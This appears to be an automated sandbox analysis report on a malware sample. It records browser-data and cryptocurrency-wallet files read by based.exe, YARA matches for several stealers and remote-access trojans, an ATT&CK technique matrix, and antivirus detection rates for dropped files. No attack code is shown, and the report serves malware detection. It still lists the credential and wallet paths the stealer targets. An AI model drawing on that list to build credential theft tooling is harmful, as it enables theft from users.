Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 1700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match

File source: 00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	331 Windows Management Instrumentation	111 Scripting	1 Abuse Elevation Control Mechanism	41 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	11 DLL Side-Loading	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	113 Command and Scripting Interpreter	321 Registry Run Keys / Startup Folder	311 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	48 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	321 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	241 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Rootkit	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	233 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	141 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
VaTlw2kNGc.exe	47%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\E9LXmGxXsL.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\winlogon.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\svchost.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/CoinMiner.lnxah
C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\setup.exe	100%	Avira	TR/CoinMiner.lnxah
C:\Program Files\Mozilla Firefox\dwm.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\powershell.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	100%	Joe Sandbox ML
C:\Recovery\winlogon.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\hacn.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	100%	Joe Sandbox ML
C:\ProgramData\setup.exe	100%	Joe Sandbox ML
C:\Program Files\Mozilla Firefox\dwm.exe	100%	Joe Sandbox ML
C:\Recovery\powershell.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	71%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files\Mozilla Firefox\dwm.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ProgramData\Microsoft\based.exe	55%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\Microsoft\hacn.exe	71%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\setup.exe	71%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\ProgramData\svchost.exe	79%	ReversingLabs	Win32.Trojan.Uztuby
C:\Recovery\powershell.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Recovery\winlogon.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	75%	ReversingLabs	Win32.Trojan.Casdet
C:\Users\user\AppData\Local\Temp\_MEI69202\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	92%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Users\user\Desktop\CjJRSFHW.log	17%	ReversingLabs
C:\Users\user\Desktop\EcYAEBsU.log	17%	ReversingLabs
C:\Users\user\Desktop\GQcIpPoS.log	4%	ReversingLabs
C:\Users\user\Desktop\HMPjFLLW.log	17%	ReversingLabs
C:\Users\user\Desktop\IJrrbLaQ.log	8%	ReversingLabs
C:\Users\user\Desktop\KVBZghxI.log	8%	ReversingLabs
C:\Users\user\Desktop\MAhhiIaK.log	12%	ReversingLabs
C:\Users\user\Desktop\NOQISejH.log	17%	ReversingLabs
C:\Users\user\Desktop\NXnICQCE.log	8%	ReversingLabs
C:\Users\user\Desktop\PbqyFjSG.log	12%	ReversingLabs
C:\Users\user\Desktop\RKFGfNRs.log	12%	ReversingLabs
C:\Users\user\Desktop\THthvKov.log	17%	ReversingLabs
C:\Users\user\Desktop\UuxpgXjt.log	12%	ReversingLabs
C:\Users\user\Desktop\bbeWvQkg.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\chceADSX.log	8%	ReversingLabs
C:\Users\user\Desktop\eeEmWDhS.log	12%	ReversingLabs

